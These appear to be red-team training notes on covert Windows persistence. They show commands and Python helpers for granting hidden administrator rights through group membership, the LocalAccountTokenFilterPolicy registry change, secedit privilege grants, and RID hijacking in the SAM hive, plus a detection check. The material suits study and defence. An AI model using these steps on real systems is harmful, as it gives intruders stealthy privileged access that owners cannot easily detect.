# Tampering With Unprivileged Accounts

Once we have administrator access, we need persistence on the machine that is hard for the blue team to detect. Creating a fresh administrator account is easy to spot, so the techniques below instead give an existing unprivileged account administrative capabilities in less obvious ways.

## Assign Group Membership

```
C:\> net localgroup administrators newuser1 /add
```

Now we can use `newuser1` to log on to the machine as an administrator. However, because of the `LocalAccountTokenFilterPolicy` feature of UAC (the "remote UAC" restriction), administrative privileges are stripped from the access token of any local account other than the built-in Administrator (RID 500) when it logs on over the network (for example via WinRM, SMB or PsExec), so a remote session as `newuser1` only gets a filtered, medium-integrity token.

To regain the administrative privileges for our user over the network we disable this filtering by setting the following registry value to 1 (the value does not exist by default, which is equivalent to 0, i.e. filtering enabled):

```
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```

## Special Privileges and Security Descriptors

A similar result can be obtained without modifying any group membership: instead of putting the user in a group, we assign privileges to the account directly through the local security policy with `secedit`. \
For this, we first export the current configuration to a temporary file.

```
secedit /export /cfg config.inf
```

Then we edit `config.inf` and, under the `[Privilege Rights]` section, append the user to the lines of the privileges we want (for example `SeBackupPrivilege` and `SeRestorePrivilege`, which together allow reading and writing any file on the system regardless of its ACL).

<figure><img src="/files/LRGRUgYAWZEOpFATBlQX" alt=""><figcaption></figcaption></figure>

Then we import the edited .inf file into a security database (.sdb) and apply that database to the system:

```
secedit /import /cfg config.inf /db config.sdb

secedit /configure /db config.sdb /cfg config.inf
```
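The editing step above is usually done by hand, but it is easy to get wrong. The following Python is an added example, not part of these notes or of `secedit` itself: it edits the exported template text in memory, appending an account to the privilege lines under `[Privilege Rights]` (creating the line when the privilege is not listed yet, leaving every other section untouched), and parses the result back so the change can be verified before it is imported. The template contents, the account name `newuser1` and the privileges chosen are constructed for the example.

```python
import re
from typing import Iterable

# Constructed, trimmed sample of what `secedit /export /cfg config.inf` produces.
SAMPLE_INF = """[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 0
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""

SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
ENTRY_RE = re.compile(r"^(\w+)\s*=\s*(.*)$")


def _members(value: str) -> list[str]:
    """Split 'a,b,c' into a list, dropping blanks (entries are *SIDs or account names)."""
    return [x.strip() for x in value.split(",") if x.strip()]


def grant_privileges(inf_text: str, user: str, privileges: Iterable[str]) -> str:
    """Return inf_text with `user` appended to each requested privilege in [Privilege Rights].

    Privileges not yet listed get a new line at the end of the section; a user who is
    already present is not duplicated; all other sections are copied unchanged.
    """
    wanted = set(privileges)
    out: list[str] = []
    in_section = False

    def flush_missing() -> None:
        # Emit lines for privileges that had no entry in the section at all.
        for priv in sorted(wanted):
            out.append(f"{priv} = {user}")
        wanted.clear()

    for line in inf_text.splitlines():
        header = SECTION_RE.match(line)
        if header:
            if in_section:
                flush_missing()
            in_section = header.group(1) == "Privilege Rights"
            out.append(line)
            continue
        if in_section:
            entry = ENTRY_RE.match(line)
            if entry and entry.group(1) in wanted:
                members = _members(entry.group(2))
                if user not in members:
                    members.append(user)
                line = f"{entry.group(1)} = {','.join(members)}"
                wanted.discard(entry.group(1))
        out.append(line)
    if in_section:  # [Privilege Rights] was the last section of the file
        flush_missing()
    return "\n".join(out) + "\n"


def privilege_holders(inf_text: str, privilege: str) -> list[str]:
    """Parse who holds `privilege` in [Privilege Rights]; also handy for auditing a host."""
    in_section = False
    for line in inf_text.splitlines():
        header = SECTION_RE.match(line)
        if header:
            in_section = header.group(1) == "Privilege Rights"
            continue
        if in_section:
            entry = ENTRY_RE.match(line)
            if entry and entry.group(1) == privilege:
                return _members(entry.group(2))
    return []


if __name__ == "__main__":
    edited = grant_privileges(SAMPLE_INF, "newuser1", ["SeBackupPrivilege", "SeRestorePrivilege"])
    print(edited)
```

`secedit` writes the export as UTF-16 text (hence the `[Unicode]` section), so read and write the real `config.inf` with `encoding="utf-16"` before running the `/import` and `/configure` commands above. The privileges only show up in `whoami /priv` after the user logs off and on again, because they are placed in the token at logon.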

## RID Hijacking

When a new user is created on a Windows system, it is assigned a Relative Identifier (RID), the last component of its SID, which the system uses to tell accounts apart. During logon, LSASS (Local Security Authority Subsystem Service) retrieves the user's RID from the SAM (Security Account Manager) registry hive and uses it to build the access token. The RID is stored in the `F` value of the account's key under `HKLM\SAM\SAM\Domains\Account\Users`; by editing that value we can make the system hand an unprivileged user the Administrator's access token, effectively granting elevated privileges while the account keeps its own name and password.

On Windows systems, the built-in Administrator account is always assigned the RID 500, while standard user accounts typically receive RIDs starting from 1000.

To change the RID of the target user, first identify its current RID (the last number of the SID):

```
C:\> wmic useraccount get name,sid

Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount      S-1-5-21-1966530601-3185510712-10604624-503
Guest               S-1-5-21-1966530601-3185510712-10604624-501
newuser1            S-1-5-21-1966530601-3185510712-10604624-1008
newuser2            S-1-5-21-1966530601-3185510712-10604624-1009
newuser3            S-1-5-21-1966530601-3185510712-10604624-1010
```

We want to change the RID of `newuser3` from 1010 to 500.\
Registry Editor must run as SYSTEM for this (for example `psexec -i -s regedit.exe`), because the `HKLM\SAM` hive is not readable even by administrators by default. The account's key is named after its RID in hex (1010 = 0x3F2, so `000003F2`), and inside the `F` value the RID is stored at offset 0x30 as a DWORD in little-endian order (0x03F2 becomes `F2 03 00 00`):

<figure><img src="/files/GZWQJoaLnDh1JbKZoP25" alt=""><figcaption></figcaption></figure>

Then we change it to RID 500 (0x01F4), which in little-endian order is `F4 01 00 00`:

<figure><img src="/files/ttE8V2VZM1ZwLnXcx5Yi" alt=""><figcaption></figcaption></figure>

`newuser3` is now an administrator: the next time it logs on, LSASS builds its token with RID 500, so the account receives the built-in Administrator's token while keeping its own name and password and without any change to group membership. Because RID 500 is exempt from `LocalAccountTokenFilterPolicy`, the token is not filtered for remote logons either.
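As an added example (not part of these notes), the Python below carries the RID arithmetic through end to end: it takes the `wmic` listing, derives the SAM subkey name for the target account (the RID as eight hex digits, `000003F2` for 1010), and patches the RID DWORD at offset 0x30 of a constructed stand-in for the account's `F` value, producing the same `F2 03 00 00` to `F4 01 00 00` change made in Registry Editor above. It also includes the reverse check a defender would run, flagging any account whose `F` RID no longer matches the key it lives under. The `F` buffer here is constructed (zeros apart from the RID field); a real one carries logon timestamps and account flags as well.

```python
import re
import struct

SAM_USERS_KEY = r"HKLM\SAM\SAM\Domains\Account\Users"
RID_OFFSET = 0x30       # the RID DWORD lives at this offset inside the user's F value
F_VALUE_SIZE = 0x50     # length used for the constructed sample F value

# Constructed copy of the `wmic useraccount get name,sid` output from above.
WMIC_OUTPUT = """Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
Guest               S-1-5-21-1966530601-3185510712-10604624-501
newuser3            S-1-5-21-1966530601-3185510712-10604624-1010
"""


def parse_wmic_useraccount(output: str) -> dict[str, int]:
    """Map account name -> RID from the wmic table; header and blank lines are skipped."""
    accounts: dict[str, int] = {}
    for line in output.splitlines():
        m = re.match(r"^(\S+)\s+S-1-5-21-\d+-\d+-\d+-(\d+)\s*$", line)
        if m:
            accounts[m.group(1)] = int(m.group(2))
    return accounts


def sam_user_key(rid: int) -> str:
    """Name of the account's subkey under SAM_USERS_KEY: the RID as 8 upper-case hex digits."""
    return f"{rid:08X}"


def rid_le_bytes(rid: int) -> bytes:
    """The RID as the little-endian DWORD regedit shows in F (1010 -> F2 03 00 00)."""
    return struct.pack("<I", rid)


def rid_in_f(f_value: bytes) -> int:
    """Read the RID back out of an F value."""
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def hijack_rid(f_value: bytes, new_rid: int) -> bytes:
    """Return a copy of the F value with only the RID DWORD replaced; all other bytes are kept."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    if not 0 < new_rid < 2**32:
        raise ValueError("RID must fit in a DWORD")
    return f_value[:RID_OFFSET] + rid_le_bytes(new_rid) + f_value[RID_OFFSET + 4:]


def build_sample_f_value(rid: int) -> bytes:
    """Constructed stand-in for a real F value: zeros apart from the RID field."""
    buf = bytearray(F_VALUE_SIZE)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def rid_mismatch(key_name: str, f_value: bytes) -> bool:
    """Defender's check: the RID inside F should equal the hex key name the account lives under."""
    return int(key_name, 16) != rid_in_f(f_value)


def plan_hijack(wmic_output: str, target: str, source: str = "Administrator") -> dict:
    """Describe the registry edit that makes `target` log on with `source`'s RID."""
    accounts = parse_wmic_useraccount(wmic_output)
    target_rid, source_rid = accounts[target], accounts[source]
    before = build_sample_f_value(target_rid)
    after = hijack_rid(before, source_rid)
    return {
        "key": SAM_USERS_KEY + "\\" + sam_user_key(target_rid),   # key name is NOT renamed
        "offset": RID_OFFSET,
        "before": before[RID_OFFSET:RID_OFFSET + 4].hex(" ").upper(),
        "after": after[RID_OFFSET:RID_OFFSET + 4].hex(" ").upper(),
        "mismatch_after": rid_mismatch(sam_user_key(target_rid), after),
    }


if __name__ == "__main__":
    for field, value in plan_hijack(WMIC_OUTPUT, "newuser3").items():
        print(f"{field}: {value}")
```

The key itself keeps its name (`000003F2`): the account is still found by name through the SAM's `Names` subkey, which points at that key, and only the RID copied into the token comes from `F`. That is exactly what `rid_mismatch` exploits for detection: dumping the `Users` keys as SYSTEM and comparing each key name with the RID in its `F` value exposes a hijacked account immediately.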

